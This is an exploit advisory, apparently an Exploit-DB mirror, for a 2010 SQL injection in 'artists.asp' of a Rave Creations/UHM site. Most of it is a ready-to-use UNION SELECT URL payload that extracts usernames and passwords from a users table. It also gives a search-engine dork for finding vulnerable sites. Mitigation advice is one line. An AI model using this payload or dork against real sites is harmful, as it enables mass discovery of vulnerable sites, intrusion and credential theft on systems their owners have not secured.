(artists.asp) SQL Injection Vulnerability

vendor:

N/A

by:

Ra3cH

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

(artists.asp) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be sent as a parameter in the URL, for example http://[site]/artists.asp?id=24%20union%20select%201,username,userpass,4,5,6,7,8,9,10,11,12,13%20from%20users

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

************************************************************
**      (artists.asp) SQL Injection Vulnerability 
************************************************************
**  Prodcut:        Rave Creations/UHM     
**  Home   :         N/A
**  Vunlerability :        SQL Injection
**  Risk  :        High
**  Dork :         "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
************************************************************
** Discovred by:    Ra3cH
** From           :    Algeria
** Contact     :     e51@hotmail.fr
** *********************************************************
** Greetz to :     ALLAH
**         All Members of  http://www.DZ4All.cOm/Cc
**          And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & ..... 
************************************************************
**  Exploit:
**
**  http://[PATH]/artists.asp?id=(SQL)
**
**  SQL=union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users
**  
************************************************************
**  Exemple:
**
**
**  http://[site]/artists.asp?id=24%20union%20select%201,username,userpass,4,5,6,7,8,9,10,11,12,13%20from%20users
**  
***********************************************************